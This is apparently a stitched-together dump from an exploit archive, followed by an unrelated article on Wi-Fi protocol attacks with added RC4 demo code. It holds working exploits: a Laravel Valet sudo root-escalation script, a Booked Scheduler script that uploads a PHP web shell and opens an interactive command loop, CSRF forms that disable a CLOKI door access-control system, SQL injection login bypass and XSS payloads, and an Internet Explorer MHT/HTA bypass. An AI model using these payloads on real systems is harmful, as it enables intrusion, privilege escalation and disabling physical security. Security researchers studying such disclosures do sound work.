# will prompt the user for the sudo password in the command line. From here (and in fact
# from any point where the valet tool uses sudo) the command can execute further commands
# as root without any further interaction needed by the user.

# With this 'sudo' access, the installer does its thing, and eventually installs two new
# sudoers rules for homebrew[5] and valet[6].

# ~ $ cat /etc/sudoers.d/*
# Cmnd_Alias BREW = /usr/local/bin/brew *
# %admin ALL=(root) NOPASSWD: BREW
# Cmnd_Alias VALET = /usr/local/bin/valet *
# %admin ALL=(root) NOPASSWD: VALET

# The problem with the sudoers rules now is the fact that a user controlled script
# (remember the valet command is writable to my user?) is allowed to be run with
# root privileges. More conveniently, without a password. So, to trivially privesc
# using this flaw, simply edit the `valet` command and drop `/bin/bash` in there. :D
# Or, use this lame script you lazy sod.
#
# ~ $ sudo -k
# ~ $ python escalate.py
# * Shell written. Dropping into root shell
# bash-3.2# whoami
# root
# bash-3.2# exit
# exit
# * Cleaning up POC from valet command

# [1] https://github.com/laravel/valet/commit/b22c60dacab55ffe2dc4585bc88cd58623ec1f40
# [2] https://github.com/laravel/valet/blob/v2.0.3/composer.json#L39
# [3] https://github.com/laravel/valet/blob/v2.0.3/cli/valet.php#L37-L50
# [4] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Nginx.php#L133
# [5] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Brew.php#L171-L177
# [6] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Valet.php#L40-L46

import os
import subprocess

MIN_VERSION = "1.1.4"
MAX_VERSION = "2.0.3"
POC = "/bin/bash; exit;\n"


def run_shit_get_output(shit_to_run):
    return subprocess.Popen(shit_to_run, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)


def version_tuple(v):
    return tuple(map(int, (v.split("."))))


def get_valet():
    p = run_shit_get_output('which valet')
    lines = ''.join(p.stdout.readlines())

    if 'bin/valet' in lines:
        return lines.strip()

    return None


def get_valet_version(valet_location):
    p = run_shit_get_output(valet_location)
    v = p.stdout.read(25)

    return v.split("\n")[0].split(" ")[2]


def can_write_to_valet(valet_location):
    return os.access(valet_location, os.W_OK)


def cleanup_poc_from_command(command_location):
    with open(command_location, 'r') as vc:
        command_contents = vc.readlines()

    if command_contents[1] == POC:
        print('* Cleaning up POC from valet command')
        command_contents.pop(1)

        with open(command_location, 'w') as vc:
            vc.write(''.join(command_contents))

        return

    print('* Could not cleanup the valet command. Check it out manually!')
    return


def main():
    valet_command = get_valet()
    if not valet_command:
        print(' * The valet command could not be found. Bailing!')
        return

    # get the content so we can check if we already pwnd it
    with open(valet_command, 'r') as vc:
        command_contents = vc.readlines()

    # check that we havent already popped this thing
    if command_contents[1] == POC:
        print('* Looks like you already pwnd this. Dropping into shell anyways.')
        os.system('sudo ' + valet_command)
        cleanup_poc_from_command(valet_command)
        return

    current_version = get_valet_version(valet_command)

    # ensure we have a valid, exploitable version
    if not (version_tuple(current_version) >= version_tuple(MIN_VERSION)) \
            or not (version_tuple(current_version) <= version_tuple(MAX_VERSION)):
        print(' * Valet version {0} does not have this bug!'.format(current_version))
        return

    # check that we can write
    if not can_write_to_valet(valet_command):
        print('* Cant write to valet command at {0}. Bailing!'.format(valet_command))
        return

    # drop the poc line and write the new one
    command_contents.insert(1, POC)
    with open(valet_command, 'w') as vc:
        vc.write(''.join(command_contents))

    print('* Shell written. Dropping into root shell')

    # drop in the root shell :D
    os.system('sudo ' + valet_command)
    cleanup_poc_from_command(valet_command)


if __name__ == '__main__':
    main()
-
Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
# Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
# Vulnerability founder: AkkuS
# Date: 13/12/2021
# Exploit Author: 0sunday
# Vendor Homepage: https://www.bookedscheduler.com/
# Software Link: N/A
# Version: Booked Scheduler 2.7.5
# Tested on: Kali 2021.2
# CVE: CVE-2019-9581

#!/usr/bin/python3
import sys
import requests
from random import randint


def login():
    login_payload = {
        "email": username,
        "password": password,
        "login": "submit",
        # "language": "en_us"
    }
    login_req = request.post(
        target + "/booked/Web/index.php",
        login_payload,
        verify=False,
        allow_redirects=True
    )
    if login_req.status_code == 200:
        print("[+] Logged in successfully.")
    else:
        print("[-] Wrong credentials !")
        exit()
    # pull the CSRF token out of the landing page for the theme-update request
    return login_req.text.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]


def upload_shell(csrf):
    boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999))
    _headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
        "Accept-Language": "en-US,en;q=0.5",
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "multipart/form-data; boundary=---------------------------" + boundary,
        "Origin": target,
        "Connection": "close",
        "Referer": target + "/booked/Web/admin/manage_theme.php?update"
    }
    # hand-built multipart body: the FAVICON_FILE part carries a .php file
    data = "-----------------------------" + boundary + "\r\n"
    data += "Content-Disposition: form-data; name=\"LOGO_FILE\"\r\n\n\n"
    data += "-----------------------------" + boundary + "\r\n"
    data += "Content-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"simple_shell.php\"\r\n"
    data += "Content-Type: application/x-php\r\n\n"
    data += "<?php $o = system($_REQUEST[\"cmd\"]);die?>\r\n\n"
    data += "-----------------------------" + boundary + "\r\n"
    data += "Content-Disposition: form-data; name=\"CSS_FILE\"\r\n\n\n"
    data += "-----------------------------" + boundary + "\r\n"
    data += "Content-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\n"
    data += csrf + "\r\n"
    data += "-----------------------------" + boundary + "--\r\n"

    # In case you need some debugging
    _proxies = {'http': 'http://127.0.0.1:8080'}

    upload_req = request.post(
        target + "/booked/Web/admin/manage_theme.php?action=update",
        headers=_headers,
        data=data
        # proxies=_proxies
    )


def shell():
    shell_req = request.get(target + "/booked/Web/custom-favicon.php")
    if shell_req.status_code == 200:
        print("[+] Uploaded shell successfully")
        print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=")
    else:
        print("[-] Shell uploading failed")
        exit(1)

    print()
    cmd = ''
    while cmd != 'exit':
        cmd = input("$ ")
        shell_req = request.get(target + "/booked/Web/custom-favicon.php" + '?cmd=' + cmd)
        print(shell_req.text)


if len(sys.argv) != 4:
    print("[+] Usage : " + sys.argv[0] + " https://target:port username password")
    exit()

target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
request = requests.session()

csrf = login()
upload_shell(csrf)
shell()
-
Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)
# Exploit Title: Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)
# Date: 13/12/2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.axesstmc.com/cloki/

<!--

Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control


Vendor: Zucchetti Axess S.p.A.
Product web page: https://www.axesstmc.com
Affected version: 1.64
                  1.63
                  1.54

Summary: CLOKI is the pre-installed application on our terminals that
provides simple to use access control management and attendance monitoring
using any browser (IE, Chrome, Firefox, etc.). It is suited for anyone
looking for a stand-alone Access Control and Attendance Monitoring system
where the users' data is not frequently changed. Data management is simple
and intuitive and no additional software is needed on the PC intended to be
used as web base. CLOKI for Access Control also allows configuration and
monitoring of access at all company entrances (doors, gates, turnstiles etc).
The Access Control manages any type of reader, entrance and access credential.
Using an impartial selector it is possible to check that employees do not
take company assets and allows registration of all accesses to the system
and all operations that users carry out.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
These actions can be exploited to perform authentication detriment and account
password change with administrative privileges if a logged-in user visits a
malicious web site.

Tested on: Start X3 (h02 build 4163)
           Start X1 (g01 build 2804)
           X1/X2/X3/X4/X7 Web Server


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5689
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php


13.11.2021

-->


CSRF disable AC:
----------------

<html>
  <body>
    <form action="http://10.0.0.2:8081/redirect.cgi">
      <input type="hidden" name="flagAccessControlChanged" value="true" />
      <input type="hidden" name="RAct" value="5" />
      <input type="hidden" name="EnR" value="1" />
      <input type="hidden" name="ExR" value="1" />
      <input type="hidden" name="DenyRTout" value="5" />
      <input type="hidden" name="DenyR" value="0" />
      <input type="hidden" name="IType" value="0" />
      <input type="hidden" name="E485" value="on" />
      <input type="hidden" name="GType" value="0" />
      <input type="hidden" name="TOO" value="50" />
      <input type="hidden" name="TOC" value="50" />
      <input type="hidden" name="TOOE" value="100" />
      <input type="hidden" name="TOCE" value="100" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


CSRF enable AC:
---------------

<html>
  <body>
    <form action="http://10.0.0.2:8081/redirect.cgi">
      <input type="hidden" name="flagAccessControlChanged" value="true" />
      <input type="hidden" name="ACtrl" value="on" />
      <input type="hidden" name="RAct" value="5" />
      <input type="hidden" name="EnR" value="1" />
      <input type="hidden" name="ExR" value="1" />
      <input type="hidden" name="DenyRTout" value="5" />
      <input type="hidden" name="DenyR" value="0" />
      <input type="hidden" name="IType" value="0" />
      <input type="hidden" name="E485" value="on" />
      <input type="hidden" name="GType" value="0" />
      <input type="hidden" name="TOO" value="50" />
      <input type="hidden" name="TOC" value="50" />
      <input type="hidden" name="TOOE" value="100" />
      <input type="hidden" name="TOCE" value="100" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
Online Thesis Archiving System 1.0 - SQLi Authentication Bypass
# Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass
# Exploit Author: Yehia Elghaly (YME)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
# Version: Online Thesis Archiving System 1.0
# Tested on: Windows, xampp
# CVE: N/A

- Description: SQLi Authentication Bypass

A SQL Injection vulnerability exists in Online Thesis Archiving System 1.0. An admin account takeover is possible with either of the payloads:

admin' #
admin' or '1'='1

PoC:

POST /otas/admin/login.php HTTP/1.1
Host: 192.168.113.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://192.168.113.130
DNT: 1
Connection: close
Referer: http://192.168.113.130/otas/admin/login.php
Cookie: PHPSESSID=0jsudph494kpt2a5jvbvdvsrsc
Upgrade-Insecure-Requests: 1

username=admin' #&password=admin' #

- Description: Stored Cross Site Scripting (XSS)

Stored Cross Site Scripting (XSS) exists in Online Thesis Archiving System 1.0.

Steps:
1. Go to (http://localhost/otas/admin/?page=departments) and (http://localhost/otas/admin/?page=curriculum)
2. Add a new (curriculum) or (department)
3. Insert your payload <script>("xssyf")</script>
-
Microsoft Internet Explorer / ActiveX Control - Security Bypass
# Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass
# Exploit Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt
# twitter.com/hyp3rlinx
# ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft Internet Explorer (MSIE)

Internet Explorer is a discontinued series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.

[Vulnerability Type]
ActiveX Control Security Bypass

[CVE Reference]
N/A

[Security Issue]
Upon opening a specially crafted .MHT file on disk, Internet Explorer ActiveX control warnings as well as popup blocker privacy settings are not enforced. This can allow the execution of ActiveX content with zero warning to an unsuspecting end user and/or force them to visit arbitrary attacker-controlled websites.

By default, when opening browser-associated files that contain active content, MSIE restricts scripts from running without explicit user interaction and permission. Instead, end users are presented with a yellow warning bar on the browser's webpage, asking first if they wish to allow the running of blocked content. This prevents execution of active content scripts or controls without the user first clicking the "Allow blocked content" warning bar.

However, specially crafted MHT files residing on disk that contain an invalid header directive suppress ActiveX warnings and popup blocker privacy settings. Therefore, to bypass Internet Explorer "active content" blocking, files need to contain a Content-Location header using an arbitrary named value, e.g. "Content-Location: PBARBAR".

Note, often times MHT files are set to open in IE by default, and IE, while discontinued, is still present on the Windows OS.

Tested successfully on Windows 10 latest fully patched version with default IE security settings.

Expected result: ActiveX control security warning, prevention of code execution and blocking browser popup windows.

Actual result: No ActiveX control code execution blocking, security warnings or browser window popup blocking enforcement.

[PoC Requirements]
MHT file must reside on disk, think targeted attack scenarios.

[Exploit/POC]
Change [VICTIM] value below to a specified user for testing.

1) Create the MHT PoC file.
"MSIE_ActiveX_Control_Security_Bypass.mht"

From:
Subject:
Date:
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"

This is a multi-part message in MIME format.

--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001
Content-Type: text/html; charset="UTF-8"
Content-Location: DOOM

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<script>
win=window
win.open("http://www.microsoft.com","","width=600,height=600")
var args = ['height='+1,'width='+1,].join(',')
setTimeout("", 3000)
var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv ________________________________________________________.hta', 'pop', args)
pop.moveTo(2000,2000)
</script>
</body>
</html>
--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--

2) Create the PoC HTA file.
"Sales_Report_2021.csv ________________________________________________________.hta"

<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
<script language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("calc.exe")
</script>

3) Open the MHT file locally.

[Network Access]
Local

[POC/Video URL]
https://www.youtube.com/watch?v=UCSqFbYUvBk

[Disclosure Timeline]
Vendor Notification: May 13, 2019
MSRC : July 2, 2019 "We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case."
December 5, 2021 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
-
Title: One article to understand Wireless Security Protocols: WEP, WPA, WPA2 and WPA3
This article covers the wireless security protocols WEP, WPA, WPA2 and WPA3. For each of them, we will try to point out their advantages and disadvantages and describe some possible attacks.

WEP protocol

WEP was introduced as part of the original 802.11 standard approved in 1997, and it is probably the most commonly used WiFi security protocol. Its 10-digit or 26-digit hexadecimal (40-bit or 104-bit) key is very easy to identify. In 2004, both WEP-40 and WEP-104 were declared deprecated. There are 128-bit (the most common) and 256-bit WEP variants, but as computing power continues to improve, attackers are able to exploit many security vulnerabilities. In short, this protocol can no longer meet security needs.

It uses the RC4 cipher to ensure privacy and a CRC-32 checksum to ensure the integrity of the transmitted data.

First, a key k is shared between network users (the protocol does not specify how to share it). To send a message M, the integrity checksum c(M) of the message must be calculated and concatenated to it: we now have M||c(M). M||c(M) is then encrypted by XOR with the RC4 stream generated from k and a 24-bit public initialization vector (IV) named v. We write this stream as RC4(v, k). The result C = M||c(M) ⊕ RC4(v, k) is sent over the network, and users who know k can recover the message by XORing C with RC4(v, k).

The RC4 stream cipher used by WEP is based on two algorithms:

The first is the RC4 Key Scheduling Algorithm (KSA), which converts a key of length 1 to 256 bits into an initial permutation S of the numbers 0 to N. The internal state of RC4 consists of two numbers i and j, which are used as pointers into S.

The second algorithm is the RC4 Pseudo-Random Generation Algorithm (PRGA). It generates a single byte of key stream from the current internal state of RC4 and then updates the internal state. Initially N = 255, but the algorithm can use different N values.

With CRC-32, the original message is XORed with a 32-bit constant followed by as many 0s as needed to reach the length of the message. The result becomes a new "message" and the operation is repeated until the length of the result is lower than the length of the constant. It should be noted that this hash function is linear and bondless.

WEP attacks:

- Packet Injection
- Fake Authentication
- FMS Attack
- KoreK Attack
- ChopChop Attack
- Fragment Attack
- PTW Attack (Pyshkin, Tews, Weinmann)

Packet Injection

This allows an outsider to generate a large amount of traffic on the network without having to be associated with it in any way. First, he must capture a specific type of packet. Although hidden behind encryption, the packet type can be easily guessed from the packet size. An ARP request packet is always 28 bytes. By reinjecting it into the network, the AP will respond to this forged request and send packets to the legitimate client. The extra traffic is used to collect encrypted packets faster, and the more packets he has, the more likely he is to break WEP faster.

Fake Authentication

The fake authentication attack allows an attacker to join a WEP-protected network even if he does not know the root key. Clients can authenticate themselves to WEP-protected networks in two ways:

The first method is open system authentication, with basically no protection.

The second method is called shared key authentication. This uses the secret root key and a challenge-response authentication. The client asks the AP to connect, the AP sends a frame containing a challenge (a random byte string, in plaintext), and the client answers with a WEP-encrypted frame. If there is no problem, the AP replies with success.

An attacker who sniffs such a handshake can join the network himself. Except for the AP challenge, all bytes in frame 3 are constant. The challenge is transmitted in plaintext in frame 2, so the attacker can recover the key stream (and IV) used to encrypt frame 3. With it, he can now initiate the authentication handshake and construct a valid frame (number 3).

FMS Attack

Released in 2001 by Fluhrer, Mantin, and Shamir, it is based on the known RC4 weaknesses with IVs (initialization vectors or random numbers, 3 bytes of the per-packet key). The attacker can manipulate RC4, allowing him to guess one byte (5% probability) of the key. If the key is wrong, the attacker tries again with a new key. To achieve a 50% success rate, an attacker needs to capture a large number of packets (up to 6 million).

If we know the first "l" bytes of each packet key, we can simulate RC4-KSA. Without going too deep into the math here, basically the next byte of the key depends (a bit) on the current byte and can be used to check whether we are on the right track. In each iteration we get one more byte of the key and end up testing it. If it is wrong, that byte of the key is swapped with another possible value and the process restarts.

KoreK Attack

This is based on the FMS attack (it first appeared in the NetStumbler forum in 2004), but allows the attacker to find the key faster.

ChopChop Attack

Also found by "KoreK", instead of exploiting the weakness of RC4, it attacks the WEP protocol itself (CRC32 checksum and lack of replay protection). It enables an attacker to decrypt packets without knowing the key. Flip a bit in the ciphertext and then calculate which bit in the encrypted CRC32 value must be flipped so that the packet remains valid. The often mentioned method is to take off the last byte and try to guess its value.

Fragment Attack

If there is currently no client connected to the access point, a good attack can be run. Similar to the ChopChop attack, it speeds up the cracking process by injecting arbitrary packets into the AP. It will generate enough traffic to capture a large number of IVs, thereby improving the chances of cracking the key (aircrack-ng). "aireplay-ng" and "packetforge-ng" are the standard toolkits for such attacks.

PTW Attack

The Pyshkin, Tews, Weinmann (PTW) attack was released in 2007. What makes PTW more powerful than all other attacks is that it can take advantage of every packet captured. Instead of trying all possible key combinations, it implements a key ranking strategy, selects a set of likely keys and continues the RC4 algorithm based on these keys. Using different voting strategies, an attacker can select the most likely key byte at each decision in the tree to determine the correct key. Tests show that a 50% chance of success is obtained with just 35,000 to 40,000 packets. Other sources point out that we can get a 95% chance with 85,000 frames.

WPA

WPA was launched in 2003 as the Wi-Fi Alliance's direct response to, and replacement for, the increasingly obvious vulnerabilities in the WEP encryption standard. The most common WPA configuration is WPA-PSK (Pre-Shared Key). The 256-bit key used by WPA is a significant increase over the 64-bit and 128-bit keys used in WEP systems.

Note: WPA-PSK basically means that the Wi-Fi network has a password shared by every Wi-Fi network client.

WPA includes message integrity checks (to determine whether an attacker has captured/changed packets passed between the access point and the client) and the Temporal Key Integrity Protocol (TKIP). TKIP uses a per-packet key system, which is more secure than the fixed-key system used by WEP. The TKIP encryption standard was later replaced by the Advanced Encryption Standard (AES).

TKIP uses the same underlying mechanism as WEP and is therefore vulnerable to many similar attacks (such as ChopChop and MIC key recovery attacks). Usually people do not attack the WPA protocol directly, but rather the supplementary system launched with WPA, Wi-Fi Protected Setup (WPS).

Note: TKIP (Temporal Key Integrity Protocol): the RC4 stream cipher is used with a 128-bit per-packet key, which means it dynamically generates a new key for each packet. Although still in use, it was considered obsolete after being replaced by CCMP in 2009.

WPA attacks:

- Beck and Tews' Improved Attack on RC4, 2008 (injection)
- Ohigashi-Morii Attack (Beck and Tews' attack + man in the middle)
- Michael Attacks
- Dictionary Attack (handshake, key recovery)

Beck and Tews' attack

The attack (actually) "requires" Quality of Service (QoS) to be enabled. This allows multiple channels to be used. Each channel has its own TSC (TKIP sequence counter). Channel 0 has most of the traffic, and the other channels have lower TSCs. The attack requires that the key renewal interval be greater than 15 minutes (the time it takes to decrypt the ARP packet). The attacker deauthenticates the station and then captures the ARP packet. Next, he performs the modified ChopChop attack to recover the packet's ICV (integrity check value) and MIC. In this way, the attacker needs to guess the last part of the packet, i.e. the IP address. Finally, he inverts the MICHAEL algorithm and obtains the MIC key. With it, he can now inject custom packets into the network.

Countermeasure: Disable QoS.

Ohigashi-Morii attack

Two types of keys are used for data encryption:

- Pairwise Transient Key (PTK): used to protect unicast data frames
- Group Temporal Key (GTK): used to protect group-addressed data frames (such as broadcast ARP frames)

The attacker sends an ARP request (with his MAC and the AP's IP address), so the other clients update their ARP tables. This way, all clients send their packets to the attacker. The attacker receives packets decrypted by the AP and re-encrypts them with his own key.

Everyone can build and broadcast fake packets using the GTK. Messages sent with the group key are not protected against spoofing.

WPA2 protocol

Of course, WPA2 replaces WPA. Certification began in September 2004, and since March 13, 2006 it has been mandatory for all new devices bearing the Wi-Fi trademark. The most important upgrade is the mandatory use of the AES algorithm (rather than the previous RC4) and the introduction of CCMP (AES-CCMP, Counter Mode with Cipher Block Chaining Message Authentication Code Protocol, 128 bits) as a replacement for TKIP (which is still present in WPA2 as a fallback system and for WPA interoperability). As in previous versions, attacks on WPS are the most common attacks.

Note: WPA/WPA2 MGT (Management) means that the password is not a pre-shared key; instead an authentication service is used, usually a RADIUS service that verifies the username/password of a Wi-Fi network client. MGT is most often associated with an enterprise/professional environment.

WPA2 attacks:

- KRACK Attack
- PMKID Attack (PSK)
- WPS Attack
- Dictionary Attack

KRACK Attack

This attack targets the four-way handshake used to establish a nonce (a kind of "shared secret") in the WPA2 protocol. The WPA2 standard expects WiFi to be occasionally disconnected and allows reconnection with the same value in the third handshake message (for fast reconnection and continuity). Since this standard does not require different keys to be used in this type of reconnection, which may be required at any time, replay attacks are possible.

Countermeasure: The access point has configuration options that can disable EAPOL-Key frame retransmission during key installation.

Useful: Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2

PMKID Attack (PSK)

On August 4, 2018, a new exploit was released for Wi-Fi networks using WPA/WPA2-PSK (pre-shared key). The vulnerability allows an attacker to obtain the PSK for a specific SSID. The attack was discovered by accident while looking for new ways to attack the new WPA3 security standard. The main difference compared to other attacks is that in this attack there is no need to capture a complete EAPOL 4-way handshake. The new attack is performed against the RSN IE of a single EAPOL frame.

- Regular users are no longer needed, because the attacker communicates directly with the AP (also known as a "clientless" attack).
- You do not need to wait for the complete 4-way handshake between a regular user and the AP.
- No more retransmitted EAPOL frames (which may lead to uncrackable results) and no more invalid passwords sent by regular users.
- EAPOL frames are not lost when a regular user or the AP is too far from the attacker.
- Nonce and replay counter values are no longer required (resulting in slightly higher speed).
- There are no more special output formats (pcap, hccapx, etc.): the final data is displayed as a regular hex-encoded string.

Source: https://hashcat.net/forum/thread-7717.html

Countermeasures: It is recommended to disable 802.11r on WPA/WPA2-PSK networks.

WPS Attack

WPS was launched in 2006, and the goal of the protocol is to allow Wi-Fi Protected Access for home users who know very little about wireless security, and to easily add new devices to existing networks without entering a long password. In December 2011, a vulnerability was discovered affecting WPS-capable wireless routers. The vulnerability allows remote attackers to recover the WPS PIN within a few hours through brute force and to use the WPS PIN to recover the network's WPA/WPA2 pre-shared key.

WPS lets clients send an 8-digit PIN to the access point, which the access point verifies before allowing the client to connect. The PIN contains only numbers, and there is latency in WPS because the attacker needs to wait for the AP to respond. Therefore, an attacker can try several keys per second (or one key every few seconds). We have 8 digits with 10 possibilities each, 10^8 (100,000,000). This is too much. The 8th digit is a checksum of the first 7 digits, so we have 10^7. Additionally, the PIN used for verification is divided into two halves, so we can verify the first 4 and last 4 digits independently. It is much easier to guess a 4-digit number twice than an 8-digit number once. Finally, the math gives: 10^4 + 10^3 = 11,000 guesses.

While this strategy used to take hours, the newer WPS Pixie-Dust attack can crack the network in seconds. Since 2011, many routers have had protections to detect and slow down (rate limit) or shut out Reaver-type attacks (locking after too many failed PIN attempts). Routers have updated some settings to protect WPS, but the way they implement encryption remains flawed. Creating truly random numbers, which is necessary to generate strong encryption, is relatively difficult. To achieve this, there is usually a function that takes a "seed" and produces a pseudo-random number. If you use long or variable "seed" numbers, you can get the same results as with actually random numbers, but if you use a "seed" that is easy to guess, or worse, use the same "seed" time and time again, you end up with weak encryption that is easy to crack. That is what happens with those newer routers, and what the WPS Pixie-Dust attack exploits.

Countermeasure: Turn off the WPS function.

Dictionary Attack

This relies on capturing the WPA handshake and then using a word list or brute force to crack the password. Depending on the password strength (length, character set), it can be difficult or impossible to crack it in a "reasonable" time.

Countermeasure: Use long passwords (12+) and different character sets (alphanumeric, special characters, uppercase/lowercase).

WPA3 protocol

In January 2018, the Wi-Fi Alliance announced WPA3 to replace WPA2. The new standard uses 128-bit encryption in WPA3-Personal mode (WPA-PSK pre-shared key) or 192-bit in WPA3-Enterprise (RADIUS authentication server). WPA3 will be harder to attack because of its modern key establishment protocol, called Simultaneous Authentication of Equals (SAE) or Dragonfly key exchange. SAE improves the security of the initial key exchange and provides better protection against offline dictionary attacks. But it is equally vulnerable to man-in-the-middle attacks and cannot resist evil WiFi phishing attacks.
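The WEP construction described in the article (C = M||c(M) ⊕ RC4(v, k)) and the remark that the CRC-32 integrity check is linear can both be checked directly. The Python block below is an added example and is not part of the original article: it implements RC4's KSA and PRGA exactly as described, wraps a message the way WEP does, and then tests the linearity identity crc32(a ⊕ b) = crc32(a) ⊕ crc32(b) ⊕ crc32(0…0), which holds for CRC-32 and fails for a keyed MAC such as HMAC-SHA256. That property is the reason a stream cipher plus CRC gives no integrity and why WPA2's CCMP moved to a real MAC. The 24-bit IV, the 40-bit key and the message bytes are constructed for the demo.

```python
"""RC4, WEP-style encapsulation and CRC-32 linearity (added example, not from the article)."""
import hashlib
import hmac
import zlib


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Return n bytes of RC4 keystream for `key` (1..256 bytes)."""
    # KSA: derive the initial permutation S of 0..255 from the key.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # PRGA: emit one byte per step, updating the (i, j) state each time.
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, k: bytes, msg: bytes) -> bytes:
    """WEP data encapsulation: (M || CRC32(M)) XOR RC4(IV || k); the IV travels in clear."""
    assert len(iv) == 3, "WEP uses a 24-bit IV"
    icv = zlib.crc32(msg).to_bytes(4, "little")  # the integrity check value c(M)
    return xor(msg + icv, rc4_keystream(iv + k, len(msg) + 4))


def wep_decrypt(iv: bytes, k: bytes, ct: bytes):
    """Return (message, icv_ok); icv_ok is False when the recovered CRC does not match."""
    payload = xor(ct, rc4_keystream(iv + k, len(ct)))
    msg, icv = payload[:-4], payload[-4:]
    return msg, zlib.crc32(msg).to_bytes(4, "little") == icv


def crc32_is_linear(a: bytes, b: bytes) -> bool:
    """CRC-32 is affine over GF(2): crc(a^b) == crc(a) ^ crc(b) ^ crc(0^n) for equal lengths."""
    assert len(a) == len(b)
    zeros = bytes(len(a))
    return zlib.crc32(xor(a, b)) == zlib.crc32(a) ^ zlib.crc32(b) ^ zlib.crc32(zeros)


def hmac_is_linear(a: bytes, b: bytes, key: bytes) -> bool:
    """The same identity tested on HMAC-SHA256; a keyed MAC does not satisfy it."""
    assert len(a) == len(b)

    def tag(m: bytes) -> int:
        return int.from_bytes(hmac.new(key, m, hashlib.sha256).digest(), "big")

    zeros = bytes(len(a))
    return tag(xor(a, b)) == tag(a) ^ tag(b) ^ tag(zeros)


if __name__ == "__main__":
    # Constructed demo values: 24-bit IV, 40-bit WEP-64 key, ARP-sized payload.
    iv, k = b"\x01\x02\x03", b"\x0a\x0b\x0c\x0d\x0e"
    msg = b"constructed 28-byte payload!"
    ct = wep_encrypt(iv, k, msg)
    print("round trip:", wep_decrypt(iv, k, ct) == (msg, True))
    # Flipping one ciphertext bit flips the same plaintext bit; the CRC then fails,
    # but only because nobody adjusted it, which linearity makes possible.
    tampered = bytes([ct[0] ^ 0x01]) + ct[1:]
    print("tampered ICV ok:", wep_decrypt(iv, k, tampered)[1])
    print("CRC-32 linear:", crc32_is_linear(b"hello world!", b"HELLO WORLD?"))
    print("HMAC linear:  ", hmac_is_linear(b"hello world!", b"HELLO WORLD?", b"demo-key"))
```

The `rc4_keystream` routine reproduces the published RC4 test vector (key "Key" yields keystream EB9F7781B734CA72A7…), so the WEP wrapper is built on a correct cipher rather than a stand-in.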
-
meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)
